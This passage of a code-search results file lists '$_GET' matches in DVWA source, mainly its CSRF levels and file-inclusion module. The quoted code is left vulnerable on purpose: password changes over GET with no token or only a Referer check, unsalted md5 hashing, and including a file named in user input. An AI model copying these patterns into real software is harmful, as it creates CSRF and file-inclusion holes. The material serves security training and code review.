class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise current password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 152,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise current password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 153,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise current password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 10,
"start": 5,
"end": 16,
"severity": "unknown",
"note": ""
},
{
"id": 159,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 160,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 161,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 165,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Checks <span class=\"token keyword\">to</span> see where the request came from\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stripos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_REFERER'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>!<span class=\"token operator\">=</span><span class=\"token operator\">-</span><span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">6:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">7:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 166,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Checks <span class=\"token keyword\">to</span> see where the request came from\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stripos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_REFERER'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>!<span class=\"token operator\">=</span><span class=\"token operator\">-</span><span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">6:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">7:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!",
"line": 7,
"start": 2,
"end": 13,
"severity": "unknown",
"note": ""
},
{
"id": 167,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Checks <span class=\"token keyword\">to</span> see where the request came from\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stripos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_REFERER'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>!<span class=\"token operator\">=</span><span class=\"token operator\">-</span><span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">6:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">7:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t\t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 197,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/index.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">29:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">30:</span> }\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> require_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/fi/source/{$vulnerabilityFile}\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \n<span class=\"highlight\"><span class=\"line-number\">34:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">count</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span></span>\n<span class=\"line-number\">35:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span>\n<span class=\"line-number\">36:</span> \t<span class=\"token function\">include</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">37:</span> <span class=\"token keyword\">else</span> {\n<span class=\"line-number\">38:</span> \t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'Location:?page=include.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">39:</span> \t<span class=\"token keyword\">exit</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 34,
"start": 29,
"end": 40,
"severity": "unknown",
"note": ""
},
{
"id": 200,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Input validation\n<span class=\"line-number\">7:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">fnmatch</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"file*\"</span><span class=\"token punctuation\">,</span> <span class=\"token 